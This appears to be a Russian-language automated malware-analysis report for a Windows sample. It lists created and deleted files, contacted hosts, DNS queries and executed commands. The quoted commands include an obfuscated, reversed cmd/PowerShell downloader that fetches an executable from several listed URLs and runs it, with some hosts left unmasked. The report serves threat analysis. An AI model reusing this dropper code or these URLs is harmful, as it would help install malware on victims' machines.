Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:O\C"set RE=;'MLU'=XnY$}}{hctac}};kaerb;'vKu'=qkd$;Aza$ metI-ekovnI{ )00008 eg- htgnel.)Aza$ metI-teG(( fI;'oBw'=HnH$;)Aza$ ,FGX$(eliFdaolnwoD.sCq${yrt...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\567.exe
Удаляет следующие файлы
- %TEMP%\567.exe
Сетевая активность
Подключается к
- 'be##net.com':80
- '17#.#10.89.16':80
- 'ru###irect.net':80
TCP
Запросы HTTP GET
- http://be##net.com/fxoOxOBP
- http://ru###irect.net/al1
UDP
- DNS ASK ox##in.com
- DNS ASK be##net.com
- DNS ASK ba##bkk.com
- DNS ASK ru###irect.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:O\C"set RE=;'MLU'=XnY$}}{hctac}};kaerb;'vKu'=qkd$;Aza$ metI-ekovnI{ )00008 eg- htgnel.)Aza$ metI-teG(( fI;'oBw'=HnH$;)Aza$ ,FGX$(eliFdaolnwoD.sCq${yrt...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:O/C"set RE=;'MLU'=XnY$}}{hctac}};kaerb;'vKu'=qkd$;Aza$ metI-ekovnI{ )00008 eg- htgnel.)Aza$ metI-teG(( fI;'oBw'=HnH$;)Aza$ ,FGX$(eliFdaolnwoD.sCq${yrt{)DcF$ ni FGX$(hcaerof;'exe.'+ZoI$+'\'+p...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo $UzV='hKb';$qCs=new-object Net.WebClient;$FcD='http://ox##in.com/XWB2FL0h@http://bemsnet.com/fxoOxOBP@http://178.210.89.16/VTXawsz@http://ballbkk.com/iOI3NaX@http://rushdirect.ne...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
